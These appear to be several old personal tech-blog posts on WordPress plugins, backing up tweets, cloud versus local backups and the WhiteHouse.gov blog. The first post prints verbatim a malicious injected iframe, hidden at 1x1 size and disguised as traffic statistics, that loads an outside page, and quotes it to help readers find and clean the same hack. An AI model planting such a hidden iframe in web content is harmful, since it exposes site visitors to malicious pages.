annoying HTML injection in WordPress

Two of my old posts at my geekblog Haibane.info, dating from November 2007, had injected HTML code in them. The injected code read as follows:

<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

I only became aware of it when Google flagged my archives for that month as “malicious”. Viewing the source of the archives page revealed the hack – probably from some window of time in which I hadn’t upgraded to the latest WordPress version.

To ensure you don’t have old posts in your archives with this exploit, just search your posts for the term “iframe”. Edit those posts and you’ll likely find code similar to the above.

WordPress has come a long way in making upgrades easier with one click (though some people still run into problems on occasion). I think it would be better if WP had an incremental and automated upgrade process whereby any security-related update could install automatically, just as you can configure in Windows. Ideally, this would be controlled by a Dashboard setting to “turn on/off automatic security patches”. When enabled, it would “register” your blog with the mothership at wordpress.org so that whenever a security patch becomes available, you get an automatic email to your admin account notifying you, and the patch is applied automatically the next time you log in to the Dashboard.

Tags to Hashtags #wp

I’ve written a new plugin entitled “AHP Tags to Hashtags” for use with WordPress and WordPress MU. For now the plugin can be found at pastebin here; I will update this post when it’s been added to the official WordPress plugin repository.

The plugin appends the tags for each post to the post title in the RSS feed. For example, for a post titled “Awesome post” which is tagged “Amazing, Awesome, Super awesome”, the RSS feed will show the post title as “Awesome post #Amazing #Awesome #Superawesome”. Note that spaces within a tag are removed, and a hash symbol (#) is prepended to each.
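The conversion itself is just string manipulation. Here’s a minimal sketch of the logic in Python (the plugin itself is PHP hooked into WordPress’s feed-title filter; the function name here is illustrative):

```python
def tags_to_hashtags(title, tags):
    """Append each tag to the title as a hashtag, stripping spaces."""
    hashtags = ["#" + tag.replace(" ", "") for tag in tags]
    return title + " " + " ".join(hashtags) if hashtags else title

# tags_to_hashtags("Awesome post", ["Amazing", "Awesome", "Super awesome"])
#   -> "Awesome post #Amazing #Awesome #Superawesome"
```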

This plugin is useful primarily to bloggers who pipe their posts into Twitter. The post tags become Twitter hashtags. Since post tags and Twitter hashtags are both forms of metadata, it is natural to automatically reuse one as the other.

Consider a blog post on the Iran election. Normally you’d tag the post Iran, and then when you tweet it, you’d have to manually insert the Twitter hashtag #iranelection. Now you can simply tag the post iranelection (no # symbol) and it will automatically be hashtagged. Combined with a service like Twitterfeed, this plugin can greatly automate the process of piping relevant posts into the twitterverse.

Note that the plugin makes no attempt to check that the total length of the post title, including hashtags, falls within the 140-character limit imposed by Twitter.

At present the plugin has no options. The feature roadmap includes the following:
– add title character length checking
– toggle using tags or categories for conversion to hashtags
– let the user decide whether to remove spaces in tags, or convert them to underscores or another character

This is a pretty simple plugin, so other feature requests are appreciated.

UPDATE: version 2.0 of the plugin is at pastebin here. This version no longer appends all tags, but only those already beginning with #. This way the blogger can selectively choose which tags they want converted into hashtags.
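In sketch form (again illustrative Python, not the plugin’s actual PHP), version 2.0’s selection rule looks like this:

```python
def selective_hashtags(title, tags):
    """Append only the tags that already begin with '#', stripping spaces."""
    chosen = [t.replace(" ", "") for t in tags if t.startswith("#")]
    return title + " " + " ".join(chosen) if chosen else title
```

So tagging a post “#iran election” yields “#iranelection” in the feed title, while a plain tag like “politics” is left off entirely.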

backups should be local, not to the cloud

One of the lessons of Friendfeed’s buyout by Facebook is that the cloud is not a good place for backup. In an era of the sub-$100 terabyte, the idea that the best place for our data should be anywhere other than right at home is a strange one. Cloud backup is useful as a meta-backup – for example, using Jungledisk and Amazon’s S3 service to back up your local backups – to guard against catastrophe, but should never be your primary repository.

For data like photos, this is pretty much a moot point, as everyone keeps their originals on their own disk and uploads select photos to Flickr/Picasa etc. (and at lower resolution than the originals). But for text, like blog posts and tweets, most people simply leave their content in the cloud – which includes leaving your WordPress database at your hosting provider rather than on your local disk. I haven’t yet found a good solution for local WordPress database backups, but I have written previously about various backup strategies for Twitter. Sarah Perez at RWW just did a piece on 10 ways to archive your tweets as well, but most of these are again cloud-based solutions. Marshall Kirkpatrick has a guide to using Google Reader along with Dave Winer’s new OPML tool to consolidate all your tweets and your friends’ tweets, but this isn’t a true backup solution either, as I point out in comments. The point, however, is that as long as the data lives only in the cloud, it’s not really backed up – data wants to be imprisoned, not set free.
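For the WordPress case specifically, one workable stopgap is a scheduled mysqldump pulled to your local disk. A rough sketch in Python – the database name, user, and host are placeholders, and it assumes mysqldump is on your PATH with credentials supplied via ~/.my.cnf so it can run unattended:

```python
import datetime

def dump_command(db, user, host="localhost"):
    """Build a mysqldump invocation that writes a dated .sql backup file.

    Credentials are assumed to live in ~/.my.cnf so a cron job can run
    this without prompting for a password.
    """
    stamp = datetime.date.today().isoformat()
    outfile = "%s-backup-%s.sql" % (db, stamp)
    return ["mysqldump", "-h", host, "-u", user, db], outfile

# e.g., from a nightly cron job or scheduled task:
# import subprocess
# cmd, outfile = dump_command("wordpress", "wp_user")
# with open(outfile, "w") as f:
#     subprocess.call(cmd, stdout=f)
```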

One Million Strong for @aplusk

Ashton Kutcher has done it – he has amassed one million followers. He’s using this publicity to donate mosquito nets to African children, but that’s just scratching the surface of what is possible.

Use your imagination: what could he do with his combination of celebrity and follower clout?

– he could raise money for a politician or cause
– he could single-handedly launch a new brand or artist
– he could function as a one-man Digg or Slashdot effect

But more importantly, he can actually influence the public sphere. Consider that Twitter users are the elite: early adopters and opinion makers. Ashton Kutcher can now promote ideas to this elite. He’s a nexus of potential memes.

This is a landmark day. We don’t know how yet, but we will.

the WhiteHouse.gov blog: open government

Among the inaugural festivities, the official web site of the White House underwent a transition of its own. The site is now built around a central blog, which is a presidential first and a definite sign of the times. The first post lays out the purpose of the blog in detail:

Just like your new government, WhiteHouse.gov and the rest of the Administration’s online programs will put citizens first. Our initial new media efforts will center around three priorities:

Communication — Americans are eager for information about the state of the economy, national security and a host of other issues. This site will feature timely and in-depth content meant to keep everyone up-to-date and educated. Check out the briefing room, keep tabs on the blog (RSS feed) and take a moment to sign up for e-mail updates from the President and his administration so you can be sure to know about major announcements and decisions.

Transparency — President Obama has committed to making his administration the most open and transparent in history, and WhiteHouse.gov will play a major role in delivering on that promise. The President’s executive orders and proclamations will be published for everyone to review, and that’s just the beginning of our efforts to provide a window for all Americans into the business of the government. You can also learn about some of the senior leadership in the new administration and about the President’s policy priorities.

Participation — President Obama started his career as a community organizer on the South Side of Chicago, where he saw firsthand what people can do when they come together for a common cause. Citizen participation will be a priority for the Administration, and the internet will play an important role in that. One significant addition to WhiteHouse.gov reflects a campaign promise from the President: we will publish all non-emergency legislation to the website for five days, and allow the public to review and comment before the President signs it.

We’d also like to hear from you — what sort of things would you find valuable from WhiteHouse.gov? If you have an idea, use this form to let us know.

I think that the key here is that the WH website remains an organ of the Executive Branch and is not just another blog in the standard political/technology sense. The Communication role is of course obvious, but Transparency and Participation are also key. Posting executive orders to the web site is a great start, and allowing the public to review and comment on legislation before it gets to the President’s desk is going to really open the legislative process to the public in an innovative and rigorous way.

It’s interesting to see that a lot of technology experts don’t seem to understand the civic context of the purpose of the WH blog. For example, Dave Winer complains,

The White House should send us to places where our minds will be nourished with new ideas, perspectives, places, points of view, things to do, ways we can make a difference. It must take risks, because that is reality — we’re all at risk now — hugely.

I don’t advocate a blogging host like the Obama campaign website. There are already plenty of places to host blogs. But I do want the White House to be a public space, where new thinking from all over the world meets other new thinking. A flow distributor. A two-way briefing book for the people and the government.

We need the minds of industry, education, health care, government, people from all walks of life, to connect. It doesn’t have to be whitehouse.gov, but why not, why wait?

I think this critique is unfair – partly because by publicizing executive orders and legislation, the public minds Dave talks about will have unprecedented access to the inner workings of the executive branch. By using the blog as a central distribution point, it already is the two-way briefing book he talks about.

What the WH site should not be, however, is a “public space”. The two-way flow needs to be of absolute highest SNR, which anyone who has spent even ten minutes online can attest is fundamentally incompatible with an open forum. The flow of information in both directions must be structured and controlled for maximum efficiency. If instead WH.gov becomes another home to the constant stream of garbage that spews over most public fora on the web, then one, the public will not be well-served by having to wade through the muck to find the information of genuine civic interest; and two, the very concept of an open and transparent portal into the inner workings of government will be discredited, and that we above all must not allow to happen. WH.gov is a courageous experiment and we must not let it fail.

It should be noted that the official WhiteHouse YouTube channel does allow comments. Since YouTube is not a government site, there isn’t the same requirement of decorum and civic sensibility, so a free-for-all can be tolerated.

Related – see Patrick Ruffini, Ars Technica, and TechCrunch for further comments on the WH.gov blog from a technological perspective. Also see Democracy Arsenal and Open Left for brief commentary from a political perspective. Finally, Read/Write Web has a nice 12-year retrospective on the evolution of the WH.gov website through the past several Presidencies.

Backing up your tweets

Twitter: over one billion tweets served. Actually, it’s probably more than that, since the figure comes from GigaTweet, an external service, rather than an official count. If we do the math, that comes out to:

140 chars per tweet x 1 byte per char x 10^9 tweets = 140 billion bytes = 130.4 GB worth of data

The 1 billion tweet mark took Twitter just over two years to achieve. Even assuming exponential growth, it’s hard to see Twitter’s raw tweet storage needs exceeding a terabyte ($109 and falling) in the next five years.
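The arithmetic above is easy to verify:

```python
tweets = 10**9                           # GigaTweet's count
bytes_total = 140 * tweets               # 140 chars per tweet, 1 byte per char
gigabytes = bytes_total / float(2**30)   # binary gigabytes
print(round(gigabytes, 1))  # -> 130.4
```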

Of course, raw storage alone isn’t the whole story: unlike the gigabytes of data on our home computers, the data on Twitter needs to be actively accessed and queried from the databases, which is a non-trivial task (as any regular user of Twitter over the past year can attest). This is probably why Twitter has been enforcing a limit of 3200 tweets on users’ archives – the overhead of maintaining archives beyond that is probably a threat to Twitter’s ability to maintain uptime and service reliability. The limit seems reasonable, since only the heaviest users will have reached it by now. I’ve been on Twitter longer than most of the A-listers, and I tweet every blog entry I make from 5-6 different blogs, but I’m still only around 1200 tweets. Also, with far fewer followers (several hundred instead of thousands), I see only a handful of @replies compared to the firehose that folks like Darren (@problogger) or Scoble (@Scobleizer) see on their real-time clients. As a result, Twitter is more akin to an email/private-messaging system for users like myself, rather than a real-time chatroom for the big users.

Still, even a casual Twitter user should be at least partially alarmed at the thought that their entire Twitter history is subject to arbitrary limits and no real guarantee of backup. As usual, it’s up to us to protect our own data, especially data in a walled garden (albeit one with handy RSS and API gates). Good user practices are the same whether we are using an online service or word processing at home, after all.

Here are just a few ways in which you can backup your tweets. I am sure there are more, so if you have any ideas I’ve not listed here, please share in comments!

Tweetake.com – This service lets you enter your username and download a CSV-format file of your followers, favorites, friends, and tweets. Unfortunately, @replies are not available for backup. It doesn’t save direct messages either, but if you configure your Twitter account to send you notification emails of direct messages, you can at least archive those separately. The CSV format is useful for archiving but not very user-friendly, though you could in principle import the data again into some other form.
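Since CSV is a plain, well-supported format, re-importing the data into some other form is straightforward in any scripting language. A sketch in Python – the column names here are assumptions, as Tweetake’s actual export headers may differ:

```python
import csv
import io

def read_tweets(fileobj):
    """Parse a tweet-backup CSV into a list of row dictionaries."""
    return list(csv.DictReader(fileobj))

# Hypothetical export with assumed column names:
sample = "text,created_at\nhello world,2009-01-01\n"
rows = read_tweets(io.StringIO(sample))
# rows[0]["text"] == "hello world"
```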

Alex King’s Twitter Tools – this is a WordPress plugin that lets you manage your Twitter account directly from your WordPress blog. The plugin lets you blog each tweet and/or tweet each blog post, and you can also generate a daily tweet digest as a blog post if you choose (and assign it to an arbitrary category). There’s no way to archive replies, DMs, or follower relationships.

Twitter itself supports RSS feeds, so you could slurp your own feed of replies and tweets using a feedreader and periodically back those up or even write them to disk. Users of third-party services like Socialthing, Friendfeed, or Ping.fm also have an alternate interface to Twitter that could potentially be used for backup. However, none of these provide comprehensive tweet archives either, only real-time mirroring.
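As a sketch of the do-it-yourself route, here’s how you might parse a fetched copy of your Twitter RSS feed in Python (the per-user feed URL shown in the comment follows Twitter’s current pattern but could change):

```python
import xml.etree.ElementTree as ET

# Twitter exposes per-user timelines as RSS, e.g.
#   http://twitter.com/statuses/user_timeline/USERNAME.rss
# (fetch it with urllib or your feedreader of choice)

def extract_items(rss_text):
    """Pull (title, pubDate) pairs out of an RSS 2.0 document."""
    root = ET.fromstring(rss_text)
    return [(item.findtext("title"), item.findtext("pubDate"))
            for item in root.iter("item")]

# Appending each run's new items to a local file gives you a crude,
# rolling archive of your own tweets and replies.
```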

Finally, Dave Winer has proposed a service/API that twitter clients can use to backup the RSS feed of a twitter account, but this is more of a technical solution of interest to twitter developers rather than end users.

UPDATE: Johann Burkard has written a great little tool in Java called (appropriately) TwitterBackup. It is a very simple piece of freeware that downloads all your tweets to an XML-format file saved locally. You specify whatever filename you like, and the tool is smart enough that if you give it the name of a file that already exists, it will only download newer tweets and append them rather than do a full download again. This incremental backup of tweets is ideal behavior – the only thing the tool doesn’t do is preserve your follower/following relationships.
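The incremental-append behavior is worth spelling out, since it’s what any backup tool should do. A sketch of the idea in Python (my reconstruction of the logic, not Burkard’s actual code; tweets are modeled as (id, text) pairs with ids increasing over time):

```python
def merge_tweets(existing, fetched):
    """Append only tweets newer than anything already saved.

    Tweets are (id, text) pairs; Twitter ids increase over time,
    so anything with an id above our newest saved id is new.
    """
    newest = max((tid for tid, _ in existing), default=0)
    fresh = [(tid, text) for tid, text in fetched if tid > newest]
    return existing + sorted(fresh)
```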

To be honest, none of these solutions is perfect, though Tweetake and TwitterBackup come closest. What would the ideal Twitter backup tool look like? A few thoughts:

  1. Be available as a desktop client or Adobe AIR application rather than yet another online service asking for your Twitter password. ((Twitter’s implementation of OAuth or OpenID or some other authorization system is long overdue, by the way.))
  2. At first run, it should allow you to retrieve your entire (available) twitter history, including tweets, replies, and DMs.
  3. After the initial import, it should provide for periodic incremental backups of your tweets/replies/DMs, at an interval you specify (ideally, a five minute interval minimum).
  4. It should preserve your friend/follower relationships, and let you import everyone you follow onto any new twitter account or export all their RSS feeds as an OPML file.
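Point 4’s OPML export is simple to produce, since OPML is just a small XML vocabulary of outline elements. A sketch in Python – the feed URL pattern is Twitter’s per-user RSS scheme and may change:

```python
def follows_to_opml(usernames):
    """Render a list of Twitter usernames as an OPML subscription list."""
    feed = "http://twitter.com/statuses/user_timeline/%s.rss"
    outlines = "".join(
        '  <outline text="%s" type="rss" xmlUrl="%s"/>\n' % (u, feed % u)
        for u in usernames)
    return '<opml version="1.0"><body>\n%s</body></opml>' % outlines
```

The resulting file can be imported directly into Google Reader or any feedreader that understands OPML.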

What else? There’s definitely a niche out there for an enterprising developer to take Twitter’s API and create a tool focused on backup rather than yet another twitter client. Hopefully before I reach the 3200 tweet limit myself!